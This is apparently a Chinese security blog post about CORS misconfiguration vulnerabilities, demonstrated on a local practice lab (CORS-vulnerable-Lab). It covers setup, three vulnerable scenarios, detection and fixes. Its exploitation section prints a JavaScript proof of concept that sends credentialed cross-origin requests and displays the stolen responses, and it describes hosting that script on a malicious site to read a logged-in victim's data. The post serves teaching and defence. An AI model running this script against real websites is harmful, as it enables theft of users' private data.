前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >跨域资源共享CORS漏洞

跨域资源共享CORS漏洞

作者头像
LuckySec
发布2022-11-02 15:10:26
3.9K0
发布2022-11-02 15:10:26
举报
文章被收录于专栏:LuckySec网络安全

0x01 漏洞简介

跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据,目前已经被绝大多数浏览器支持,并被主流网站广泛部署使用。跨域资源共享 CORS 漏洞主要是由于程序员配置不当,对于 Origin 源校验不严格,从而造成跨域问题,攻击者可以利用 CORS 错误配置漏洞,从恶意网站跨域读取受害网站的敏感信息。

这里只做简单介绍,关于 CORS 漏洞的详细分析可以点击查看这篇文章:CORS漏洞原理分析

0x02 漏洞环境

漏洞靶场 CORS-vulnerable-Lab 包含了与 CORS 配置错误相关的易受攻击代码。可以在本地虚机上部署易受攻击的代码,以实际利用 CORS 相关的错误配置问题。

此项目代码需要满足以下配置环境,可利用 phpstudy 进行快速搭建。

  1. Apache web server
  2. PHP 5/7
  3. MySQL Database

安装步骤如下:

1)下载并解压项目源代到phpstudy的网站 www 目录下

2)创建一个MySQL数据库,名字叫 ica_lab ,并将项目源码 database 目录下的 ica_lab.sql 文件导入到该数据库中

3)在文本编辑器中打开 c0nnection.php ,并修改连接数据库配置信息

代码语言:javascript
复制
$conn = mysqli_connect("127.0.0.1","root","root","ica_lab");

4)最后,访问靶场地址即可

该靶场内置了3个 CORS 的漏洞场景

  • 场景一:信任任意 Origin 源
  • 场景二:正则表达式检测 Origin 源
  • 场景三:信任任意 null 源

0x03 漏洞检测

一般情况下,修改请求包 Header 中的 Origin 字段为任意域名或者为 null 的方式去检测该漏洞是否存在。

场景一:信任任意 Origin 源

应用程序接受来自任何 Origin 的 CORS 请求。该代码将 Origin 值放在 HTTP 响应头 Access-Control-Allow-Origin 中。现在,此配置将允许来自任何 Origin 的任何脚本向应用程序发出 CORS 请求。Web 浏览器将执行标准的 CORS 请求检查,来自恶意域的脚本将能够窃取数据。

应用程序接受 Origin 标头中指定的任何值。

场景二:正则表达式检测 Origin 源

应用程序已实施 CORS 策略并对列入白名单的域/子域执行“正则表达式”检查。在这种情况下,应用程序在代码中具有弱正则表达式实现,它只检查 HTTP 请求 Origin 标头中任何位置的域名 b0x.com 的存在。如果 HTTP 标头 Origin 的值为 inb0x.comb0x.comlab.com,正则表达式会将其标记为通过。这种错误配置将导致跨源共享数据。

应用程序信任列入白名单的 Origin。

应用程序不允许任何任意来源。

应用程序弱正则表达式允许在域名开头具有白名单域字符串的 Origin。

应用程序弱正则表达式允许在域名末尾具有白名单域字符串的 Origin。

场景三:信任null源

在这种情况下,应用程序 HTTP 响应标头 Access-Control-Allow-Origin 始终设置为 null。当用户指定 null 以外的任何值时,应用程序不会处理它并在 HTTP 响应中继续反映 null 。允许攻击者执行漏洞利用的技巧很少,并且可以使用 CORS 请求过滤受害者的数据。

应用程序接受 Origin 标头中指定的 null 值。

注意事项

如果响应包 Header 中为以下情况 ,则不存在漏洞。

代码语言:javascript
复制
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials:true

原因是因为浏览器会对此类情况的请求进行自动拦截,不具备漏洞利用条件。

0x04 漏洞利用

在 CORS-vulnerable-Lab 靶场的 POCs 目录下,有 CORS 漏洞利用的脚本

arbitrary_origin_exploit.html 为例,用文本编辑器打开该脚本文件,找到如下代码并根据实际应用场景进行修改

代码语言:javascript
复制
<script>
//向目标应用程序网页发出 CORS 请求以获取 HTTP 响应的函数
function exploit() {
 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
   if (this.readyState == 4 && this.status == 200) {
     var all = this.responseText;
     document.getElementById("load").innerHTML= all; // 分割打印被盗取的 HTTP 响应
     
      }
 };
 xhttp.open("GET", "http://192.168.126.6/CORS/arbitrary_origin.php", true); //将 URL 更改为错误配置 CORS 策略的 URL
 xhttp.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,\/;q=0.8");
 xhttp.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
 xhttp.withCredentials = true;
 xhttp.send();
}

</script>

将利用脚本放置在搭建的恶意网站下,当受害者在同一浏览器登录目标网站,并打开该恶意链接,即可盗取目标网站的 HTTP 响应内容。

0x05 漏洞修复

  • 禁止配置 “Access-Control-Allow-Origin” 为 “*” 和 “null”;
  • 严格校验 “Origin” 值,避免出现权限泄露;
  • 避免使用 “Access-Control-Allow-Credentials:true”;
  • 减少 “Access-Control-Allow-Methods” 所允许的方法;

参考文章

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-08-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 漏洞简介
  • 0x02 漏洞环境
  • 0x03 漏洞检测
    • 场景一:信任任意 Origin 源
      • 场景二:正则表达式检测 Origin 源
        • 场景三:信任null源
          • 注意事项
          • 0x04 漏洞利用
          • 0x05 漏洞修复
          • 参考文章
          相关产品与服务
          云数据库 MySQL
          腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档